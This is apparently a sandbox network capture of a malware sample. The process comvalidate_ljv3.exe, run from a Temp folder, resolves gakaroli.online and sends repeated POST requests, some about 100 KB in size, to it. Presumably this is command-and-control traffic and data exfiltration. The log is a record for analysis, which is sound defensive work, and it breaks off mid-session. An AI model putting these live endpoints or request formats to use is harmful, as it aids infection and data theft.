                                                                                                Nov 30, 2024 02:25:19.018170118 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.231977940 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.232067108 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.233304977 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.233313084 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.233556986 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.234426022 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.234618902 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.234653950 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.234764099 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.234800100 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.234934092 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.234978914 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:20.235105038 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:20.235122919 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.446320057 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.446388960 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.446546078 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.451265097 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.451289892 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.451302052 CET49782443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.451307058 CET44349782172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.490266085 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.490303040 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:21.490396023 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.490808010 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:21.490828991 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:22.751374960 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:22.751442909 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:22.753027916 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:22.753046036 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:22.753283024 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:22.754172087 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:22.754172087 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:22.754188061 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.384478092 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.384548903 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.384649992 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.384682894 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.384697914 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.384697914 CET49787443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.384707928 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.384715080 CET44349787172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.410732031 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.410764933 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:23.410851002 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.411106110 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:23.411118984 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:24.669837952 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:24.669970989 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:24.671256065 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:24.671267986 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:24.671536922 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:24.674901962 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:24.674921036 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:24.674927950 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.441421986 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.441489935 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.441540956 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.441615105 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.441631079 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.441654921 CET49792443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.441659927 CET44349792172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.478809118 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.478864908 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:25.478939056 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.479221106 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:25.479238033 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:26.739124060 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:26.739226103 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:26.749542952 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:26.749562025 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:26.749809980 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:26.750881910 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:26.750909090 CET49797443192.168.2.4172.67.141.133
                                                                                                Nov 30, 2024 02:25:26.750916004 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:27.368314028 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:27.368371964 CET44349797172.67.141.133192.168.2.4
                                                                                                Nov 30, 2024 02:25:27.368415117 CET49797443192.168.2.4172.67.141.133
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2024 02:25:10.791153908 CET | 58774 | 53 | 192.168.2.4 | 1.1.1.1
Nov 30, 2024 02:25:11.191823959 CET | 53 | 58774 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 30, 2024 02:25:10.791153908 CET | 192.168.2.4 | 1.1.1.1 | 0x1d49 | Standard query (0) | gakaroli.online | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 30, 2024 02:25:11.191823959 CET | 1.1.1.1 | 192.168.2.4 | 0x1d49 | No error (0) | gakaroli.online |  | 172.67.141.133 | A (IP address) | IN (0x0001) | false
Nov 30, 2024 02:25:11.191823959 CET | 1.1.1.1 | 192.168.2.4 | 0x1d49 | No error (0) | gakaroli.online |  | 104.21.87.52 | A (IP address) | IN (0x0001) | false
                                                                                                • gakaroli.online
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49766 | 172.67.141.133 | 443 | 1900 | C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-30 01:25:12 UTC | 332 | OUT | POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                Content-Length: 96
                                                                                                Host: gakaroli.online
2024-11-30 01:25:12 UTC | 96 | OUT | Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 00 00 00 00 00 00 00 00 00 2d 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-11-30 01:25:13 UTC | 824 | IN | HTTP/1.1 200 OK
                                                                                                Date: Sat, 30 Nov 2024 01:25:13 GMT
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S6psgFzNI%2F%2F7s2zqbpf3UqCWGnASeV4z%2BqkTdm5srsjd2IyK8Mt8bbZlYDfj%2FxmSAayVhMDPqvPwf%2BUdmiOQHagxuK4v6QB2R5qX7jPrDGvmXpYzIyXoiWcnjCtdSyBXkP4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70ad2cc9542da-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1767&rtt_var=671&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1064&delivery_rate=1622222&cwnd=224&unsent_bytes=0&cid=a283afdaaad9ac7b&ts=851&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49772 | 172.67.141.133 | 443 | 1900 | C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-30 01:25:14 UTC | 406 | OUT | POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 53
                                                                                                Host: gakaroli.online
2024-11-30 01:25:14 UTC | 53 | OUT | Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 03 00 00 00 00 00 00 00 00 02 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                Data Ascii:
2024-11-30 01:25:15 UTC | 749 | IN | HTTP/1.1 200 OK
                                                                                                Date: Sat, 30 Nov 2024 01:25:15 GMT
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1gFKB4KhsxTNPLv4wN4YDY4sC%2Fsyvl1fEtx5F2myDazn61WuaFrhLr9Dkfi6VwCkOH7ZS8KdZ75Pe2H1SUiyt7nFgu74wd3WLeaya9ekU2PNmlTVzap%2FL49%2BcQxCdZXD2s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70ae2aa6c0f87-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2556&min_rtt=1983&rtt_var=1153&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1095&delivery_rate=1472516&cwnd=250&unsent_bytes=0&cid=0158ed7e3e6db088&ts=667&x=0"
2024-11-30 01:25:15 UTC | 24 | IN | Data Raw: 31 32 0d 0a 00 00 00 00 00 00 00 00 02 00 00 00 fe ff ff ff 91 90 0d 0a
Data Ascii: 12
2024-11-30 01:25:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49777 | 172.67.141.133 | 443 | 1900 | C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-30 01:25:17 UTC | 407 | OUT | POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 208
                                                                                                Host: gakaroli.online
2024-11-30 01:25:17 UTC | 208 | OUT | Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 4d 00 00 00 08 00 00 00 95 00 00 00 6e 36 cb 0f 00 00 00 00 00 00 00 00 81 00 00 00 37 1b e5 87 49 60 48 00 00 00 00 00 00 00 00 31 00 00 00 37 1b e5 87 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 64 02 12 14 81 2a 92 69 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                Data Ascii: Mn67I`H17(((d*i
2024-11-30 01:25:17 UTC | 798 | IN | HTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:17 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKeZhjnAxl3XZ1JVzdeOuwW9TII1QYEu05BZLDV9hOhZ%2FpE89PJWOEw6Ynu3JDT6UGnofyXPfzzpF9K%2F8WPACE47lAdY4EHtV6bFNYeXBmcd2msh62AkHY7hwaJehM3Enlk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70aef191b4369-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1709&rtt_var=657&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1251&delivery_rate=1646926&cwnd=230&unsent_bytes=0&cid=a6ce39b3788bc08a&ts=673&x=0"


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                3 | 192.168.2.4 | 49782 | 172.67.141.133 | 443 | 1900 | C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-11-30 01:25:20 UTC | 410 | OUT | POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 103358
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:21 UTC | 808 | IN | HTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:21 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbqpNjNiA12zUUEUxNulmcSsH33e1l67a9lA%2BO8WskSYqp8w0xOjm%2FBny%2BwvEfcnWY4IEeF5ezfnX5uld0kh0JAEKQbUveg9NNCkUInvoFkiHVrqKVo8dB%2BQBaXNAEjdryw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b027bd2efa5-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1916&min_rtt=1909&rtt_var=730&sent=59&recv=112&lost=0&retrans=0&sent_bytes=2837&recv_bytes=104690&delivery_rate=1483739&cwnd=193&unsent_bytes=0&cid=8a95ef34ecde2641&ts=1220&x=0"


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                4 | 192.168.2.4 | 49787 | 172.67.141.133 | 443 | 1900 | C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-11-30 01:25:22 UTC | 407 | OUT | POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 745
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:23 UTC | 802 | IN | HTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:23 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZ8KrMxDErlTM8B7gJN5zqOwzO0zZlUK3RYBZU3hO8Ye%2BxCcidXF3kmas92DykW2oaljAumLWdN0m72uzMFd%2BR6n%2B79y56T%2B5OwTFTxTvIDS0qqArYnDod0j7kMh8c5hZOs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b12f93b9e17-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1982&rtt_var=745&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1788&delivery_rate=1467336&cwnd=186&unsent_bytes=0&cid=1f45b8e174f6cdd4&ts=642&x=0"


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                5 | 192.168.2.4 | 49792 | 172.67.141.133 | 443 | 1900 | C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-11-30 01:25:24 UTC | 407 | OUT | POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 212
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:25 UTC | 800 | IN | HTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:25 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJuWaZdU1BhpUW7ghr7YcwSaBY4S3HqgO4XdBkDR1JSkGrUF2ohyr3F32%2Fnc6AK9YvxhgvDydrQlI3h9fuMy94RvvNXg17Jn3cVGlB7%2FX37%2BtmVrNQl2AJkVB9qeD3bIqtw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b1efe251869-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1682&rtt_var=654&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1255&delivery_rate=1644144&cwnd=232&unsent_bytes=0&cid=add48188f41d29bd&ts=779&x=0"


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                6 | 192.168.2.4 | 49797 | 172.67.141.133 | 443 | 1900 | C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-11-30 01:25:26 UTC | 407 | OUT | POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 380
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:27 UTC | 802 | IN | HTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:27 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=55vqADIJHJ1reWyC3jcfxB3vvYUQLiVavbf1%2FuWBTrMB8tq7Wf9Hq6MHH24queCxErHNvjTl86%2F0sRlQAUiC0RSRsHOPs%2FQeA4PCE8CJU%2BcC7m48iwMRDLyprdqzBXMC56Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b2bde454307-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1630&rtt_var=619&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1423&delivery_rate=1754807&cwnd=237&unsent_bytes=0&cid=ece08a5ac0c2e837&ts=637&x=0"


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                7 | 192.168.2.4 | 49803 | 172.67.141.133 | 443 | 1900 | C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-11-30 01:25:28 UTC | 409 | OUT | POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 29465
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:29 UTC | 805 | IN | HTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:29 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xeTC5GViNQRbPs%2BX8gO7b2c%2BG2suUdnUJuac1RWUhb21KYkmnh0XqHgSOUaujiDYL7z7eM78KtRqdS8iXp0gWG7%2BWLT7qe2wtj15iYaMPVP%2FeX61nhSrki5htosWmkp63b8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b374b3ade9a-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1570&rtt_var=602&sent=20&recv=34&lost=0&retrans=0&sent_bytes=2836&recv_bytes=30576&delivery_rate=1796923&cwnd=199&unsent_bytes=0&cid=5d3e554defabd0e7&ts=787&x=0"


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                8 | 192.168.2.4 | 49809 | 172.67.141.133 | 443 | 1900 | C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-11-30 01:25:31 UTC | 410 | OUT | POST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 104764
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:32 UTC | 811 | IN | HTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:32 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
